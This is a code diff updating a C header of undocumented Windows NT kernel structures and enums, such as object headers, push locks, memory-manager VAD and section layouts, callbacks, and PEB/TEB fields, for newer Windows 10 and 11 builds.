@@ -364,7 +367,7 @@ char _RTL_CONSTANT_STRING_type_check(const void *s);
#define THREAD_CREATE_FLAGS_HIDE_FROM_DEBUGGER 0x00000004
#define THREAD_CREATE_FLAGS_HAS_SECURITY_DESCRIPTOR 0x00000010
#define THREAD_CREATE_FLAGS_ACCESS_CHECK_IN_TARGET 0x00000020
-#define THREAD_CREATE_FLAGS_SKIP_THREAD_SUSPEND 0x00000040
+#define THREAD_CREATE_FLAGS_BYPASS_PROCESS_FREEZE 0x00000040
#define THREAD_CREATE_FLAGS_INITIAL_THREAD 0x00000080
//
@@ -424,18 +427,6 @@ char _RTL_CONSTANT_STRING_type_check(const void *s);
MEMORY_PARTITION_MODIFY_ACCESS)
#endif
-//
-// NtCreateProcessEx specific flags.
-//
-#define PS_REQUEST_BREAKAWAY 1
-#define PS_NO_DEBUG_INHERIT 2
-#define PS_INHERIT_HANDLES 4
-#define PS_LARGE_PAGES 8
-#define PS_ALL_FLAGS (PS_REQUEST_BREAKAWAY | \
- PS_NO_DEBUG_INHERIT | \
- PS_INHERIT_HANDLES | \
- PS_LARGE_PAGES)
-
//
// Define special ByteOffset parameters for read and write operations
//
@@ -546,7 +537,7 @@ typedef struct _IO_STATUS_BLOCK {
#ifndef INTERFACE_TYPE
typedef enum _INTERFACE_TYPE {
InterfaceTypeUndefined = -1,
- Internal,
+ Internal = 0,
Isa,
Eisa,
MicroChannel,
@@ -664,6 +655,7 @@ typedef enum _KWAIT_REASON {
WrAlertByThreadId,
WrDeferredPreempt,
WrPhysicalFault,
+ WrIoRing,
MaximumWaitReason
} KWAIT_REASON;
@@ -1109,6 +1101,8 @@ typedef enum _THREADINFOCLASS {
ThreadManageWritesToExecutableMemory,
ThreadPowerThrottlingState,
ThreadWorkloadClass,
+ ThreadCreateStateChange,
+ ThreadApplyStateChange,
MaxThreadInfoClass
} THREADINFOCLASS;
@@ -1173,6 +1167,18 @@ typedef struct _PROCESS_HANDLE_SNAPSHOT_INFORMATION {
PROCESS_HANDLE_TABLE_ENTRY_INFO Handles[1];
} PROCESS_HANDLE_SNAPSHOT_INFORMATION, *PPROCESS_HANDLE_SNAPSHOT_INFORMATION;
+typedef enum _PROCESS_STATE_CHANGE_TYPE {
+ ProcessStateChangeSuspend,
+ ProcessStateChangeResume,
+ ProcessStateChangeMax,
+} PROCESS_STATE_CHANGE_TYPE, *PPROCESS_STATE_CHANGE_TYPE;
+
+typedef enum _THREAD_STATE_CHANGE_TYPE {
+ ThreadStateChangeSuspend,
+ ThreadStateChangeResume,
+ ThreadStateChangeMax,
+} THREAD_STATE_CHANGE_TYPE, *PTHREAD_STATE_CHANGE_TYPE;
+
//
// Process/Thread System and User Time
// NtQueryInformationProcess using ProcessTimes
@@ -1633,7 +1639,7 @@ typedef enum _SYSTEM_INFORMATION_CLASS {
SystemHardwareSecurityTestInterfaceResultsInformation = 166,
SystemSingleModuleInformation = 167,
SystemAllowedCpuSetsInformation = 168,
- SystemDmaProtectionInformation = 169,
+ SystemVsmProtectionInformation = 169, //ex SystemDmaProtectionInformation
SystemInterruptCpuSetsInformation = 170,
SystemSecureBootPolicyFullInformation = 171,
SystemCodeIntegrityPolicyFullInformation = 172,
@@ -1692,9 +1698,21 @@ typedef enum _SYSTEM_INFORMATION_CLASS {
SystemCodeIntegrityClearDynamicStores = 225,
SystemDifPoolTrackingInformation = 226,
SystemPoolZeroingInformation = 227,
+ SystemDpcWatchdogInformation = 228,
+ SystemDpcWatchdogInformation2 = 229,
+ SystemSupportedProcessorArchitectures2 = 230,
+ SystemSingleProcessorRelationshipInformation = 231,
+ SystemXfgCheckFailureInformation = 232,
MaxSystemInfoClass
} SYSTEM_INFORMATION_CLASS, * PSYSTEM_INFORMATION_CLASS;
+typedef struct _SYSTEM_VSM_PROTECTION_INFORMATION {
+ CHAR DmaProtectionsAvailable;
+ CHAR DmaProtectionsInUse;
+ CHAR HardwareMbecAvailable;
+ CHAR ApicVirtualizationAvailable;
+} SYSTEM_VSM_PROTECTION_INFORMATION, * PSYSTEM_VSM_PROTECTION_INFORMATION;
+
//msdn.microsoft.com/en-us/library/windows/desktop/ms724509(v=vs.85).aspx
typedef struct _SYSTEM_SPECULATION_CONTROL_INFORMATION {
union {
@@ -1727,7 +1745,10 @@ typedef struct _SYSTEM_SPECULATION_CONTROL_INFORMATION {
ULONG MdsHardwareProtected : 1;
ULONG MbClearEnabled : 1;
ULONG MbClearReported : 1;
- ULONG Reserved : 5;
+ ULONG TsxCtrlStatus : 2;
+ ULONG TsxCtrlReported : 1;
+ ULONG TaaHardwareImmune : 1;
+ ULONG Reserved : 1;
} SpeculationControlFlags;
};
} SYSTEM_SPECULATION_CONTROL_INFORMATION, *PSYSTEM_SPECULATION_CONTROL_INFORMATION;
@@ -1973,6 +1994,7 @@ typedef enum _FILE_INFORMATION_CLASS {
FileLinkInformationExBypassAccessCheck,
FileStorageReserveIdInformation,
FileCaseSensitiveInformationForceAccessCheck,
+ FileKnownFolderInformation,
FileMaximumInformation
} FILE_INFORMATION_CLASS, *PFILE_INFORMATION_CLASS;
@@ -2512,6 +2534,16 @@ typedef struct _SECTION_IMAGE_INFORMATION {
ULONG CheckSum;
} SECTION_IMAGE_INFORMATION, *PSECTION_IMAGE_INFORMATION;
+typedef struct _MI_EXTRA_IMAGE_INFORMATION {
+ ULONG SizeOfHeaders;
+ ULONG SizeOfImage;
+} MI_EXTRA_IMAGE_INFORMATION, *PMI_EXTRA_IMAGE_INFORMATION;
+
+typedef struct _MI_SECTION_IMAGE_INFORMATION {
+ SECTION_IMAGE_INFORMATION ExportedImageInformation;
+ MI_EXTRA_IMAGE_INFORMATION InternalImageInformation;
+} MI_SECTION_IMAGE_INFORMATION, *PMI_SECTION_IMAGE_INFORMATION;
+
typedef struct _SECTION_IMAGE_INFORMATION64 {
ULONGLONG TransferAddress;
ULONG ZeroBits;
@@ -2964,18 +2996,36 @@ typedef struct _OBJECT_DIRECTORY_ENTRY {
} OBJECT_DIRECTORY_ENTRY, *POBJECT_DIRECTORY_ENTRY;
typedef struct _EX_PUSH_LOCK {
- union
- {
- ULONG Locked : 1;
- ULONG Waiting : 1;
- ULONG Waking : 1;
- ULONG MultipleShared : 1;
- ULONG Shared : 28;
- ULONG Value;
+ union {
+ struct {
+ ULONG_PTR Locked : 1;
+ ULONG_PTR Waiting : 1;
+ ULONG_PTR Waking : 1;
+ ULONG_PTR MultipleShared : 1;
+ ULONG_PTR Shared : sizeof(ULONG_PTR) * 8 - 4;
+ };
+ ULONG_PTR Value;
PVOID Ptr;
};
} EX_PUSH_LOCK, *PEX_PUSH_LOCK;
+typedef struct _EX_PUSH_LOCK_AUTO_EXPAND_STATE {
+ union {
+ struct {
+ ULONG Expanded : 1;
+ ULONG Transitioning : 1;
+ ULONG Pageable : 1;
+ };
+ ULONG Value;
+ };
+} EX_PUSH_LOCK_AUTO_EXPAND_STATE, *PEX_PUSH_LOCK_AUTO_EXPAND_STATE; /* size: 0x0004 */
+
+typedef struct _EX_PUSH_LOCK_AUTO_EXPAND {
+ EX_PUSH_LOCK LocalLock;
+ EX_PUSH_LOCK_AUTO_EXPAND_STATE State;
+ ULONG Stats;
+} EX_PUSH_LOCK_AUTO_EXPAND, *PEX_PUSH_LOCK_AUTO_EXPAND; /* size: 0x0010 */
+
typedef struct _OBJECT_NAMESPACE_LOOKUPTABLE {
LIST_ENTRY HashBuckets[NUMBER_HASH_BUCKETS];
EX_PUSH_LOCK Lock;
@@ -3477,6 +3527,61 @@ typedef struct _OBJECT_HEADER {
QUAD Body;
} OBJECT_HEADER, *POBJECT_HEADER;
+//
+// Actual object header from windows 10-11.
+//
+typedef struct _OBJECT_HEADER_X {
+ LONG_PTR PointerCount;
+ union
+ {
+ LONG_PTR HandleCount;
+ PVOID NextToFree;
+ };
+
+ EX_PUSH_LOCK Lock;
+ UCHAR TypeIndex;
+
+ union
+ {
+ UCHAR TraceFlags;
+ struct
+ {
+ UCHAR DbgRefTrace : 1;
+ UCHAR DbgTracePermanent : 1;
+ };
+ };
+
+ UCHAR InfoMask;
+
+ union
+ {
+ UCHAR Flags;
+ struct
+ {
+ UCHAR NewObject : 1;
+ UCHAR KernelObject : 1;
+ UCHAR KernelOnlyAccess : 1;
+ UCHAR ExclusiveObject : 1;
+ UCHAR PermanentObject : 1;
+ UCHAR DefaultSecurityQuota : 1;
+ UCHAR SingleHandleEntry : 1;
+ UCHAR DeletedInline : 1;
+ };
+ };
+
+ ULONG Reserved;
+
+ union
+ {
+ POBJECT_CREATE_INFORMATION ObjectCreateInfo;
+ PVOID QuotaBlockCharged;
+ };
+
+ PVOID SecurityDescriptor;
+ QUAD Body;
+
+} OBJECT_HEADER_X, * POBJECT_HEADER_X;
+
#define OBJECT_TO_OBJECT_HEADER(obj) \
CONTAINING_RECORD( (obj), OBJECT_HEADER, Body )
@@ -3511,6 +3616,19 @@ typedef struct _DEVICE_MAP_V2 {
PEJOB ServerSilo;
} DEVICE_MAP_V2, * PDEVICE_MAP_V2;
+//Since W11 (22000)
+typedef struct _DEVICE_MAP_V3 {
+ OBJECT_DIRECTORY* DosDevicesDirectory;
+ OBJECT_DIRECTORY* GlobalDosDevicesDirectory;
+ PEJOB ServerSilo;
+ struct _DEVICE_MAP* GlobalDeviceMap;
+ EX_FAST_REF DriveObject[26];
+ LONGLONG ReferenceCount;
+ PVOID DosDevicesDirectoryHandle;
+ ULONG DriveMap;
+ UCHAR DriveType[32];
+} DEVICE_MAP_V3, PDEVICE_MAP_V3;
+
/*
** OBJECT MANAGER END
*/
@@ -4339,10 +4457,477 @@ typedef struct _FILE_OBJECT {
} FILE_OBJECT;
typedef struct _FILE_OBJECT* PFILE_OBJECT;
+typedef ULONG_PTR ERESOURCE_THREAD;
+typedef ERESOURCE_THREAD* PERESOURCE_THREAD;
+
+typedef struct _OWNER_ENTRY {
+ ERESOURCE_THREAD OwnerThread;
+ union {
+ LONG OwnerCount;
+ ULONG TableSize;
+ };
+
+} OWNER_ENTRY, *POWNER_ENTRY;
+
+typedef struct _ERESOURCE {
+ LIST_ENTRY SystemResourcesList;
+ POWNER_ENTRY OwnerTable;
+ SHORT ActiveCount;
+ USHORT Flag;
+ PKSEMAPHORE SharedWaiters;
+ PKEVENT ExclusiveWaiters;
+ OWNER_ENTRY OwnerThreads[2];
+ ULONG ContentionCount;
+ USHORT NumberOfSharedWaiters;
+ USHORT NumberOfExclusiveWaiters;
+ union {
+ PVOID Address;
+ ULONG_PTR CreatorBackTraceIndex;
+ };
+
+ KSPIN_LOCK SpinLock;
+} ERESOURCE, *PERESOURCE;
+
/*
* WDM END
*/
+/*
+* MM START
+*/
+typedef ULONG MMSECTION_FLAGS2;
+
+typedef struct _MMEXTEND_INFO {
+ ULONG_PTR CommittedSize;
+ ULONG ReferenceCount;
+} MMEXTEND_INFO, * PMMEXTEND_INFO; /* size: 0x0010 */
+
+//
+// Flags definitions valid only for Windows 10.
+//
+typedef struct _MMSECTION_FLAGS {
+ struct {
+ UINT BeingDeleted : 1; /* bit position: 0 */
+ UINT BeingCreated : 1; /* bit position: 1 */
+ UINT BeingPurged : 1; /* bit position: 2 */
+ UINT NoModifiedWriting : 1; /* bit position: 3 */
+ UINT FailAllIo : 1; /* bit position: 4 */
+ UINT Image : 1; /* bit position: 5 */
+ UINT Based : 1; /* bit position: 6 */
+ UINT File : 1; /* bit position: 7 */
+ UINT AttemptingDelete : 1; /* bit position: 8 */
+ UINT PrefetchCreated : 1; /* bit position: 9 */
+ UINT PhysicalMemory : 1; /* bit position: 10 */
+ UINT ImageControlAreaOnRemovableMedia : 1; /* bit position: 11 */ //CopyOnWrite
+ UINT Reserve : 1; /* bit position: 12 */
+ UINT Commit : 1; /* bit position: 13 */
+ UINT NoChange : 1; /* bit position: 14 */
+ UINT WasPurged : 1; /* bit position: 15 */
+ UINT UserReference : 1; /* bit position: 16 */
+ UINT GlobalMemory : 1; /* bit position: 17 */
+ UINT DeleteOnClose : 1; /* bit position: 18 */
+ UINT FilePointerNull : 1; /* bit position: 19 */
+ UINT PreferredNode : 6; /* bit position: 20 */
+ UINT GlobalOnlyPerSession : 1; /* bit position: 26 */
+ UINT UserWritable : 1; /* bit position: 27 */
+ UINT SystemVaAllocated : 1; /* bit position: 28 */
+ UINT PreferredFsCompressionBoundary : 1; /* bit position: 29 */
+ UINT UsingFileExtents : 1; /* bit position: 30 */
+ UINT PageSize64K : 1; /* bit position: 31 */
+ };
+} MMSECTION_FLAGS, * PMMSECTION_FLAGS; /* size: 0x0004 */
+
+//
+// Flags definitions valid only for Windows 10.
+//
+typedef struct _SEGMENT_FLAGS {
+ union {
+ struct {
+ USHORT TotalNumberOfPtes4132 : 10; /* bit position: 0 */
+ USHORT Spare0 : 2; /* bit position: 10 */
+ USHORT LargePages : 1; /* bit position: 12 */
+ USHORT DebugSymbolsLoaded : 1; /* bit position: 13 */
+ USHORT WriteCombined : 1; /* bit position: 14 */
+ USHORT NoCache : 1; /* bit position: 15 */
+ };
+ USHORT Short0;
+ }; /* size: 0x0002 */
+ union {
+ struct {
+ UCHAR FloppyMedia : 1; /* bit position: 0 */
+ UCHAR DefaultProtectionMask : 5; /* bit position: 1 */
+ UCHAR Binary32 : 1; /* bit position: 6 */
+ UCHAR ContainsDebug : 1; /* bit position: 7 */
+ };
+ UCHAR UChar1;
+ }; /* size: 0x0001 */
+ union {
+ struct {
+ UCHAR ForceCollision : 1; /* bit position: 0 */
+ UCHAR ImageSigningType : 3; /* bit position: 1 */
+ UCHAR ImageSigningLevel : 4; /* bit position: 4 */
+ };
+ UCHAR UChar2;
+ };
+} SEGMENT_FLAGS, * PSEGMENT_FLAGS; /* size: 0x0004 */
+
+typedef struct _MI_SYSTEM_CACHE_VIEW_ATTRIBUTES {
+ union {
+ ULONGLONG NumberOfPtes : 6;
+ ULONGLONG PartitionId : 10;
+ ULONGLONG Spare : 2;
+ ULONGLONG SectionOffset : 48;
+ } u1;
+} MI_SYSTEM_CACHE_VIEW_ATTRIBUTES, * PMI_SYSTEM_CACHE_VIEW_ATTRIBUTES;
+
+#define VIEW_MAP_TYPE_PROCESS 1
+#define VIEW_MAP_TYPE_SESSION 2
+#define VIEW_MAP_TYPE_SYSTEM_CACHE 3
+
+typedef struct _MI_REVERSE_VIEW_MAP {
+ struct _LIST_ENTRY ViewLinks;
+ union {
+ VOID* SystemCacheVa;
+ VOID* SessionViewVa;
+ struct _EPROCESS* VadsProcess;
+ ULONG Type : 2;
+ } u1;
+ union {
+ struct _SUBSECTION* Subsection;
+ ULONG SubsectionType : 1;
+ } u2;
+ union {
+ struct _MI_SYSTEM_CACHE_VIEW_ATTRIBUTES SystemCacheAttributes;
+ ULONGLONG AllAttributes; //Since W11
+ ULONGLONG SectionOffset;
+ } u3;
+} MI_REVERSE_VIEW_MAP, * PMI_REVERSE_VIEW_MAP; /* size: 0x0028 */
+
+typedef struct _RTL_BALANCED_NODE {
+ union
+ {
+ struct _RTL_BALANCED_NODE* Children[2];
+ struct
+ {
+ struct _RTL_BALANCED_NODE* Left;
+ struct _RTL_BALANCED_NODE* Right;
+ };
+ };
+ union
+ {
+ UCHAR Red : 1;
+ UCHAR Balance : 2;
+ ULONG_PTR ParentValue;
+ };
+} RTL_BALANCED_NODE, * PRTL_BALANCED_NODE;
+
+typedef struct _SEGMENT {
+
+ struct _CONTROL_AREA* ControlArea;
+ unsigned long TotalNumberOfPtes;
+ SEGMENT_FLAGS SegmentFlags;
+ ULONG_PTR NumberOfCommittedPages;
+ ULONG_PTR SizeOfSegment;
+
+ union {
+ struct _MMEXTEND_INFO* ExtendInfo;
+ void* BasedAddress;
+ } u1;
+
+ EX_PUSH_LOCK SegmentLock;
+
+ union {
+ union {
+ ULONG_PTR ImageCommitment;
+ ULONG CreatingProcessId;
+ };
+ } u2;
+
+ union {
+ union {
+ struct _MI_SECTION_IMAGE_INFORMATION* ImageInformation;
+ void* FirstMappedVa;
+ };
+ } u3;
+
+ struct _MMPTE* PrototypePte;
+
+} SEGMENT, * PSEGMENT; /* size: 0x0048 */
+
+typedef struct _CONTROL_AREA_COMPAT {
+
+ SEGMENT* Segment;
+ LIST_ENTRY ListHead;
+ ULONG_PTR NumberOfSectionReferences;
+ ULONG_PTR NumberOfPfnReferences;
+ ULONG_PTR NumberOfMappedViews;
+ ULONG_PTR NumberOfUserReferences;
+
+ union {
+ union {
+ ULONG LongFlags;
+ MMSECTION_FLAGS Flags;
+ };
+ } u;
+
+ union {
+ union {
+ ULONG LongFlags;
+ MMSECTION_FLAGS2 Flags;
+ };
+ } u1;
+
+ EX_FAST_REF FilePointer;
+ volatile LONG ControlAreaLock;
+ ULONG ModifiedWriteCount;
+ struct _MI_CONTROL_AREA_WAIT_BLOCK* WaitList;
+
+ union
+ {
+ struct
+ {
+ union
+ {
+ ULONG NumberOfSystemCacheViews;
+ ULONG ImageRelocationStartBit;
+ };
+ union
+ {
+ volatile LONG WritableUserReferences;
+ struct // version dependent, this bitset is not valid for w11
+ {
+ unsigned long ImageRelocationSizeIn64k : 16; /* bit position: 0 */
+ unsigned long LargePage : 1; /* bit position: 16 */
+ unsigned long SystemImage : 1; /* bit position: 17 */
+ unsigned long StrongCode : 2; /* bit position: 18 */
+ unsigned long CantMove : 1; /* bit position: 20 */
+ unsigned long BitMap : 2; /* bit position: 21 */
+ unsigned long ImageActive : 1; /* bit position: 23 */
+ };
+ };
+ union
+ {
+ ULONG FlushInProgressCount;
+ ULONG NumberOfSubsections;
+ struct _MI_IMAGE_SECURITY_REFERENCE* SeImageStub;
+ };
+ } e2;
+ } u2;
+
+ //
+ // Incomplete definition, tail is version dependent.
+ //
+
+} CONTROL_AREA_COMPAT, * PCONTROL_AREA_COMPAT;
+
+//
+// N.B.
+// Only valid for Win10.
+// Change between Win10 versions.
+//
+typedef struct _MMVAD_SHORT {
+ union
+ {
+ struct
+ {
+ struct _MMVAD_SHORT* NextVad;
+ void* ExtraCreateInfo;
+ };
+ struct _RTL_BALANCED_NODE VadNode;
+ };
+
+ ULONG StartingVpn;
+ ULONG EndingVpn;
+ UCHAR StartingVpnHigh;
+ UCHAR EndingVpnHigh;
+ UCHAR CommitChargeHigh;
+ UCHAR SpareNT64VadUChar;
+ LONG ReferenceCount;
+ EX_PUSH_LOCK PushLock;
+
+ ULONG LongFlags;
+ ULONG LongFlags1;
+
+ struct _MI_VAD_EVENT_BLOCK* EventList;
+
+} MMVAD_SHORT, * PMMVAD_SHORT; /* size: 0x0040 */
+
+typedef struct _MI_VAD_SEQUENTIAL_INFO {
+
+ struct {
+#if defined(_AMD64_)
+ ULONG_PTR Length : 12; /* bit position: 0 */
+ ULONG_PTR Vpn : 52; /* bit position: 12 */
+#else
+ ULONG Length : 11; /* bit position: 0 */
+ ULONG Vpn : 21; /* bit position: 11 */
+#endif
+ };
+
+} MI_VAD_SEQUENTIAL_INFO, * PMI_VAD_SEQUENTIAL_INFO;
+
+//
+// N.B.
+// Only valid for Win10.
+// Flags meanings change between Win10 versions.
+//
+typedef struct _MMVAD_FLAGS {
+ struct
+ {
+ ULONG VadType : 3; /* bit position: 0 */
+ ULONG Protection : 5; /* bit position: 3 */
+ ULONG PreferredNode : 6; /* bit position: 8 */
+ ULONG PrivateMemory : 1; /* bit position: 14 */
+ ULONG PrivateFixup : 1; /* bit position: 15 */
+ ULONG Enclave : 1; /* bit position: 16 */
+ ULONG PageSize64K : 1; /* bit position: 17 */
+ ULONG RfgControlStack : 1; /* bit position: 18 */
+ ULONG Spare : 8; /* bit position: 19 */
+ ULONG NoChange : 1; /* bit position: 27 */
+ ULONG ManySubsections : 1; /* bit position: 28 */
+ ULONG DeleteInProgress : 1; /* bit position: 29 */
+ ULONG LockContended : 1; /* bit position: 30 */
+ ULONG Lock : 1; /* bit position: 31 */
+ };
+} MMVAD_FLAGS, * PMMVAD_FLAGS; /* size: 0x0004 */
+
+//
+// N.B.
+// Only valid for Win10.
+// Flags meanings change between Win10 versions.
+//
+typedef struct _MMVAD_FLAGS1 {
+ struct
+ {
+ ULONG CommitCharge : 31; /* bit position: 0 */
+ ULONG MemCommit : 1; /* bit position: 31 */
+ };
+} MMVAD_FLAGS1, * PMMVAD_FLAGS1; /* size: 0x0004 */
+
+//
+// N.B.
+// Only valid for Win10.
+// Flags meanings change between Win10 versions.
+//
+typedef struct _MMVAD_FLAGS2 {
+ struct
+ {
+ ULONG FileOffset : 24; /* bit position: 0 */
+ ULONG Large : 1; /* bit position: 24 */
+ ULONG TrimBehind : 1; /* bit position: 25 */
+ ULONG Inherit : 1; /* bit position: 26 */
+ ULONG NoValidationNeeded : 1; /* bit position: 27 */
+ ULONG PrivateDemandZero : 1; /* bit position: 28 */
+ ULONG Spare : 3; /* bit position: 29 */
+ };
+} MMVAD_FLAGS2, * PMMVAD_FLAGS2; /* size: 0x0004 */
+
+typedef struct _MMVAD {
+
+ struct _MMVAD_SHORT Core;
+
+ union
+ {
+ union
+ {
+ ULONG LongFlags2;
+ volatile struct _MMVAD_FLAGS2 VadFlags2;
+ };
+ } u2;
+
+ struct _SUBSECTION* Subsection;
+ struct _MMPTE* FirstPrototypePte;
+ struct _MMPTE* LastContiguousPte;
+ LIST_ENTRY ViewLinks;
+ struct _EPROCESS* VadsProcess;
+
+ union
+ {
+ union
+ {
+ struct _MI_VAD_SEQUENTIAL_INFO SequentialVa;
+ struct _MMEXTEND_INFO* ExtendedInfo;
+ };
+ } u4;
+
+ FILE_OBJECT* FileObject;
+
+} MMVAD, * PMMVAD; /* size: 0x0088 */
+
+typedef struct _MMVIEW {
+ ULONGLONG Entry;
+ union {
+ ULONGLONG Writable : 1;
+ struct _CONTROL_AREA* ControlArea;
+ };
+ LIST_ENTRY ViewLinks;
+ PVOID SessionViewVa;
+ ULONG SessionId;
+} MMVIEW, *PMMVIEW;
+
+typedef struct _MI_IMAGE_ENTRY_IN_SESSION {
+ LIST_ENTRY Link;
+ PVOID Address;
+
+ //
+ // Incomplete and incorrect.
+ //
+
+} MI_IMAGE_ENTRY_IN_SESSION, * PMI_IMAGE_ENTRY_IN_SESSION;
+
+typedef struct _SUBSECTION_COMPAT {
+
+ struct _CONTROL_AREA* ControlArea;
+ struct _MMPTE* SubsectionBase;
+ struct _SUBSECTION* NextSubsection;
+
+ //
+ // Incomplete definition.
+ //
+
+} SUBSECTION_COMPAT, * PSUBSECTION_COMPAT;
+
+//
+// This is Windows 10 only Section Object definition.
+//
+// N.B. It completely differs from anything else.
+//
+typedef struct _SECTION_COMPAT {
+
+ RTL_BALANCED_NODE SectionNode;
+ ULONG_PTR StartingVpn;
+ ULONG_PTR EndingVpn;
+
+ union {
+ union {
+ struct _CONTROL_AREA* ControlArea;
+ struct _FILE_OBJECT* FileObject;
+ struct {
+ ULONG_PTR RemoteImageFileObject : 1; /* bit position: 0 */
+ ULONG_PTR RemoteDataFileObject : 1; /* bit position: 1 */
+ };
+ };
+ } u1;
+
+ ULONG_PTR SizeOfSection;
+
+ union {
+ ULONG LongFlags;
+ MMSECTION_FLAGS Flags;
+ } u;
+
+ struct {
+ ULONG InitialPageProtection : 12; /* bit position: 0 */
+ ULONG SessionId : 19; /* bit position: 12 */
+ ULONG NoValidationNeeded : 1; /* bit position: 31 */
+ };
+
+} SECTION_COMPAT, * PSECTION_COMPAT; /* size: 0x0040 */
+
+/*
+* MM END
+*/
+
/*
** Callbacks START
*/
@@ -4543,6 +5128,47 @@ typedef struct _RTL_CALLBACK_REGISTER {
LIST_ENTRY ListEntry;
} RTL_CALLBACK_REGISTER, *PRTL_CALLBACK_REGISTER;
+typedef
+VOID
+(*PPO_COALESCING_CALLBACK) (
+ _In_ ULONG Reason,
+ _In_ PDEVICE_OBJECT DeviceObject,
+ _In_ PVOID Context);
+
+typedef struct _PO_COALESCING_CALLBACK_V1 {
+ EX_PUSH_LOCK PushLock;
+ PVOID CoalescingCallback;
+ PVOID SelfPtr;
+ PPO_COALESCING_CALLBACK Callback;
+ BOOLEAN ClientOrServer;
+ PVOID Context;
+} PO_COALESCING_CALLBACK_V1, * PPO_COALESCING_CALLBACK_V1;
+
+typedef struct _PO_COALESCING_CALLBACK_V2 {
+ EX_PUSH_LOCK PushLock;
+ PVOID CoalescingCallback;
+ PVOID SelfPtr;
+ PPO_COALESCING_CALLBACK Callback;
+ BOOLEAN ClientOrServer;
+ PVOID Context;
+ LIST_ENTRY Link;
+ EX_CALLBACK ExCallback;
+} PO_COALESCING_CALLBACK_V2, * PPO_COALESCING_CALLBACK_V2;
+
+typedef
+BOOLEAN
+(*PNMI_CALLBACK)(
+ __in_opt PVOID Context,
+ __in BOOLEAN Handled
+ );
+
+typedef struct _KNMI_HANDLER_CALLBACK {
+ struct _KNMI_HANDLER_CALLBACK* Next;
+ PNMI_CALLBACK Callback;
+ PVOID Context;
+ PVOID Handle;
+} KNMI_HANDLER_CALLBACK, * PKNMI_HANDLER_CALLBACK;
+
/*
** Callbacks END
*/
@@ -4586,7 +5212,7 @@ typedef struct _RTL_PROCESS_MODULES {
*/
typedef enum _MEMORY_INFORMATION_CLASS {
- MemoryBasicInformation,
+ MemoryBasicInformation = 0,
MemoryWorkingSetInformation,
MemoryMappedFilenameInformation,
MemoryRegionInformation,
@@ -4598,6 +5224,7 @@ typedef enum _MEMORY_INFORMATION_CLASS {
MemoryEnclaveImageInformation,
MemoryBasicInformationCapped,
MemoryPhysicalContiguityInformation,
+ MemoryBadInformation,
MaxMemoryInfoClass
} MEMORY_INFORMATION_CLASS, *PMEMORY_INFORMATION_CLASS;
@@ -4753,7 +5380,7 @@ typedef ULONG GDI_HANDLE_BUFFER[GDI_HANDLE_BUFFER_SIZE];
#define RTL_MAX_DRIVE_LETTERS 32
#define RTL_DRIVE_LETTER_VALID (USHORT)0x0001
-#define GDI_MAX_HANDLE_COUNT 0x4000
+#define GDI_MAX_HANDLE_COUNT 0x4000 //0xFFFF
// 32-bit definitions
typedef struct _STRING32 {
@@ -5183,6 +5810,11 @@ typedef struct _RTL_USER_PROCESS_PARAMETERS {
PVOID PackageDependencyData; //8+
ULONG ProcessGroupId;
// ULONG LoaderThreads;
+ // UNICODE_STRING RedirectionDllName;
+ // UNICODE_STRING HeapPartitionName;
+ // ULONGLONG* DefaultThreadpoolCpuSetMasks;
+ // ULONG DefaultThreadpoolCpuSetMaskCount;
+ // ULONG DefaultThreadpoolThreadMaximum;
} RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;
typedef struct _PEB {
@@ -5321,6 +5953,26 @@ typedef struct _PEB {
};
};
ULONGLONG CsrServerReadOnlySharedMemoryBase;
+ //ULONGLONG TppWorkerpListLock;
+ //LIST_ENTRY TppWorkerpList;
+ //PVOID WaitOnAddressHashTable[128];
+ //PVOID TelemetryCoverageHeader;
+ //ULONG CloudFileFlags;
+ //ULONG CloudFileDiagFlags;
+ //CHAR PlaceholderCompatibilityMode;
+ //CHAR PlaceholderCompatibilityModeReserved[7];
+ //struct _LEAP_SECOND_DATA* LeapSecondData;
+ //union
+ //{
+ // ULONG LeapSecondFlags;
+ // struct
+ // {
+ // ULONG SixtySecondEnabled : 1;
+ // ULONG Reserved : 31;
+ // };
+ //};
+ //ULONG NtGlobalFlag2;
+ //ULONG64 ExtendedFeatureDisableMask;
} PEB, *PPEB;
typedef struct _TEB_ACTIVE_FRAME_CONTEXT {
@@ -5473,7 +6125,11 @@ typedef struct _TEB {
USHORT DisableUserStackWalk : 1;
USHORT RtlExceptionAttached : 1;
USHORT InitialThread : 1;
- USHORT SpareSameTebBits : 1;
+ USHORT SessionAware : 1;
+ USHORT LoadOwner : 1;
+ USHORT LoaderWorker : 1;
+ USHORT SkipLoaderInit : 1;
+ USHORT SkipFileAPIBrokering : 1;
};
};
@@ -5483,6 +6139,13 @@ typedef struct _TEB {
ULONG LockCount;
ULONG SpareUlong0;
PVOID ResourceRetValue;
+ //PVOID ReservedForWdf;
+ //ULONGLONG ReservedForCrt;
+ //GUID EffectiveContainerId;
+ //ULONGLONG LastSleepCounter;
+ //ULONG SpinCallCount;
+ //UCHAR Padding8[4];
+ //ULONGLONG ExtendedFeatureDisableMask;
} TEB, *PTEB;
typedef struct _PROCESS_DEVICEMAP_INFORMATION {
@@ -5525,6 +6188,7 @@ __inline struct _PEB * NtCurrentPeb() { return NtCurrentTeb()->ProcessEnvironmen
#define ProcessChildProcessPolicy 13
#define ProcessSideChannelIsolationPolicy 14
#define ProcessUserShadowStackPolicy 15
+#define ProcessRedirectionTrustPolicy 16
typedef struct tagPROCESS_MITIGATION_BINARY_SIGNATURE_POLICY_W10 {
union {
@@ -5633,7 +6297,7 @@ typedef struct tagPROCESS_MITIGATION_CHILD_PROCESS_POLICY_W10 {
} DUMMYUNIONNAME;
} PROCESS_MITIGATION_CHILD_PROCESS_POLICY_W10, *PPROCESS_MITIGATION_CHILD_PROCESS_POLICY_W10;
-typedef struct _PROCESS_MITIGATION_SIDE_CHANNEL_ISOLATION_POLICY_W10 {
+typedef struct tagPROCESS_MITIGATION_SIDE_CHANNEL_ISOLATION_POLICY_W10 {
union {
DWORD Flags;
struct {
@@ -5646,7 +6310,7 @@ typedef struct _PROCESS_MITIGATION_SIDE_CHANNEL_ISOLATION_POLICY_W10 {
} DUMMYUNIONNAME;
} PROCESS_MITIGATION_SIDE_CHANNEL_ISOLATION_POLICY_W10, *PPROCESS_MITIGATION_SIDE_CHANNEL_ISOLATION_POLICY_W10;
-typedef struct _PROCESS_MITIGATION_SYSTEM_CALL_DISABLE_POLICY_W10 {
+typedef struct tagPROCESS_MITIGATION_SYSTEM_CALL_DISABLE_POLICY_W10 {
union {
DWORD Flags;
struct {
